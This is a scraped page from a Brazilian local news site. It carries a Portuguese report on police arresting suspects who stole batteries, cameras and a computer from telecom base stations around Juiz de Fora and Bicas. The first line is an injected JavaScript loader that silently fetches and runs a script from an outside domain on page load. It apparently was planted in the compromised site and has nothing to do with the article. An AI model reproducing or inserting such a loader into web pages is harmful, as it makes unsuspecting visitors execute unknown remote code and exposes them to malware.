;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Em Juiz de Fora: Polícia Civil prende suspeito e recupera baterias furtadas de estações de base de telefonia e de internet. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Em Juiz de Fora: Polícia Civil prende suspeito e recupera baterias furtadas de estações de base de telefonia e de internet.

A Polícia Civil, por meio do 4º Departamento de Juiz de Fora (4º DEPPC) e da Delegacia Especializada de Repressão a Roubos (DERR), prendeu em flagrante, nessa quarta (26), no Bairro Santo Antônio, em Juiz de Fora, um homem de 27 anos, suspeito de furto. Um adolescente de 17 anos também foi apreendido. Eles são suspeitos de furtarem baterias de uma estação de base de telefonia e de internet no município de Bicas. O crime aconteceu no dia 26 de agosto quando os autores também furtaram três câmeras filmadoras e um computador do local. Investigações apontam que eles estão envolvidos em outros furtos de baterias em Mar de Espanha, Guarará e Juiz de Fora.

Conforme a delegada Patrícia Ribeiro, foram recuperadas 14 baterias estacionárias. “Que estão avaliadas, cada uma, em aproximadamente R$900. Entre as vítimas, estão a Elo Net, Oi, Claro e Powerline”, informou, complementando que, como há furtos em outras cidades, os policiais civis estão em processo de identificação da origem de cada bateria. Segundo ela, os autores atuavam durante o dia, já que as estações estão situadas em locais afastados dos grandes centros, com materiais trancados dentro de containers. A delegada também explicou que esses furtos geram prejuízos financeiros para as empresas, mas também para os usuários, que ficam sem serviços de internet e de telefonia.

As investigações continuam a fim de localizar outros suspeitos envolvidos.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.